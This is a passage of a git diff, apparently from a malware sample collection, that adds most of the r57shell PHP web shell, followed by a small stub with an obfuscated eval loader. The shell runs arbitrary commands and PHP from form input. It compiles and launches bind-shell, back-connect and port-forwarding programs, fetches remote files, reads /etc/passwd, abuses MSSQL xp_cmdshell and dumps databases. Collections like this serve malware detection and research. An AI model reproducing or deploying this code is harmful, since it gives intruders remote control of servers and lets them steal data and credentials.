ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=122 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'jade.va.us.dal.net')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></table>"; +} +echo $table_up3."<div align=center><font face=Verdana size=-2><b>[ r57shell - Modification By iFX | version ".$version." ]</b></font></div></td></tr></table>".$f; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Rst.ak b/PHP/Backdoor.PHP.Rst.ak new file mode 100644 index 00000000..3dc195c8 --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.ak @@ -0,0 +1,7 @@ +<?PHP + //Authentication +$login = "user"; //Login +$pass = "pass"; //Pass +$md5_pass = ""; //If no pass then hash +eval(gzinflate(base64_decode(''))); +?> diff --git a/PHP/Backdoor.PHP.Rst.al 